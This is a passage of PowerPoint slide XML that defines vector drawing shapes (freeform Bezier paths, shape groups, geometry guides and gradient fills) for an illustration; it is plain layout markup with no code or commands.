                          <a:pt x="111" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="117"/>
                          <a:pt x="109" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="165"/>
                          <a:pt x="112" y="170"/>
                          <a:pt x="119" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="173"/>
                          <a:pt x="162" y="183"/>
                          <a:pt x="169" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="186"/>
                          <a:pt x="193" y="176"/>
                          <a:pt x="196" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="163"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="209" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="154"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="141"/>
                          <a:pt x="237" y="135"/>
                          <a:pt x="237" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="113"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="193" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="96"/>
                          <a:pt x="198" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="123"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="193" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="193" y="73"/>
                          <a:pt x="193" y="75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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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6" name="Freeform 740"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2079" y="1200"/>
                    <a:ext cx="87" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="48" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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7" name="Freeform 741"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1973" y="1424"/>
                    <a:ext cx="209" cy="237"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 159 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 132 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 81 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 72 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 68 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 17 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 1 w 159"/>
                      <a:gd name="T13" fmla="*/ 55 h 180"/>
                      <a:gd name="T14" fmla="*/ 1 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 36 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 43 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 42 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 42 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 42 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 42 w 159"/>
                      <a:gd name="T27" fmla="*/ 66 h 180"/>
                      <a:gd name="T28" fmla="*/ 42 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 42 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 59 w 159"/>
                      <a:gd name="T33" fmla="*/ 41 h 180"/>
                      <a:gd name="T34" fmla="*/ 103 w 159"/>
                      <a:gd name="T35" fmla="*/ 30 h 180"/>
                      <a:gd name="T36" fmla="*/ 103 w 159"/>
                      <a:gd name="T37" fmla="*/ 30 h 180"/>
                      <a:gd name="T38" fmla="*/ 59 w 159"/>
                      <a:gd name="T39" fmla="*/ 41 h 180"/>
                      <a:gd name="T40" fmla="*/ 42 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 42 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 42 w 159"/>
                      <a:gd name="T45" fmla="*/ 72 h 180"/>
                      <a:gd name="T46" fmla="*/ 42 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 42 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 43 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 43 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 43 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 84 w 159"/>
                      <a:gd name="T57" fmla="*/ 157 h 180"/>
                      <a:gd name="T58" fmla="*/ 85 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 89 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 141 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 159 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 159 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 159 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="159" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="17"/>
                          <a:pt x="140" y="23"/>
                          <a:pt x="132" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="20"/>
                          <a:pt x="94" y="14"/>
                          <a:pt x="81" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="10"/>
                          <a:pt x="73" y="5"/>
                          <a:pt x="72" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="19"/>
                          <a:pt x="72" y="18"/>
                          <a:pt x="68" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="19"/>
                          <a:pt x="28" y="28"/>
                          <a:pt x="17" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="36"/>
                          <a:pt x="2" y="42"/>
                          <a:pt x="1" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="163"/>
                          <a:pt x="25" y="165"/>
                          <a:pt x="36" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="153"/>
                          <a:pt x="43" y="149"/>
                          <a:pt x="43" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="130"/>
                          <a:pt x="42" y="102"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="68"/>
                          <a:pt x="42" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="63"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="50"/>
                          <a:pt x="48" y="44"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="37"/>
                          <a:pt x="101" y="30"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="28"/>
                          <a:pt x="107" y="28"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="30"/>
                          <a:pt x="68" y="37"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="44"/>
                          <a:pt x="43" y="50"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="74"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="155"/>
                          <a:pt x="43" y="156"/>
                          <a:pt x="43" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="180"/>
                          <a:pt x="84" y="177"/>
                          <a:pt x="84" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="142"/>
                          <a:pt x="85" y="80"/>
                          <a:pt x="85" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="74"/>
                          <a:pt x="87" y="70"/>
                          <a:pt x="89" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="69"/>
                          <a:pt x="136" y="57"/>
                          <a:pt x="141" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="153" y="52"/>
                          <a:pt x="159" y="47"/>
                          <a:pt x="159" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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8" name="Freeform 742"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2089" y="1378"/>
                    <a:ext cx="119" cy="71"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 28 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="8"/>
                          <a:pt x="28" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="66" y="38"/>
                          <a:pt x="91" y="32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9" name="Oval 743"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2069" y="1129"/>
                    <a:ext cx="105" cy="105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05" name="Group 744"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1722" y="2789"/>
                  <a:ext cx="866" cy="461"/>
                  <a:chOff x="790" y="1889"/>
                  <a:chExt cx="866" cy="461"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="514" name="Freeform 745"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1625" y="1949"/>
                    <a:ext cx="31" cy="234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5" name="Freeform 746"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1592" y="1949"/>
                    <a:ext cx="33" cy="234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3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6" name="Freeform 747"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="973" y="2116"/>
                    <a:ext cx="34" cy="234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4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4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7" name="Freeform 748"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1007" y="2116"/>
                    <a:ext cx="30" cy="234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4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8" name="Freeform 749"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="2066"/>
                    <a:ext cx="33" cy="234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3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9" name="Freeform 750"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="823" y="2066"/>
                    <a:ext cx="31" cy="234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0" name="Freeform 751"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1406" y="1902"/>
                    <a:ext cx="31" cy="234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4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4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1" name="Freeform 752"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1437" y="1902"/>
                    <a:ext cx="33" cy="234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4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753"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1007" y="1949"/>
                    <a:ext cx="649" cy="207"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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3" name="Freeform 754"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="2066"/>
                    <a:ext cx="217" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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4" name="Freeform 755"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="1889"/>
                    <a:ext cx="866" cy="236"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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06" name="Group 756"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2045" y="2765"/>
                  <a:ext cx="270" cy="180"/>
                  <a:chOff x="1859" y="2279"/>
                  <a:chExt cx="372" cy="247"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="507" name="Freeform 757"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2412"/>
                    <a:ext cx="372" cy="100"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 25173"/>
                      <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T3" fmla="*/ 0 h 6756"/>
                      <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                      <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                      <a:gd name="T8" fmla="*/ 0 w 25173"/>
                      <a:gd name="T9" fmla="*/ 3378 h 67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5173" h="6756">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="25173" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="6756"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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969696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8" name="Freeform 758"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2045" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12588"/>
                      <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12588"/>
                      <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T5" fmla="*/ 964 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T7" fmla="*/ 0 h 4342"/>
                      <a:gd name="T8" fmla="*/ 0 w 12588"/>
                      <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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" name="Freeform 759"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 964 h 4342"/>
                      <a:gd name="T4" fmla="*/ 0 w 12585"/>
                      <a:gd name="T5" fmla="*/ 0 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                        <a:moveTo>
                          <a:pt x="12585" y="4342"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="434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" name="Freeform 760"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
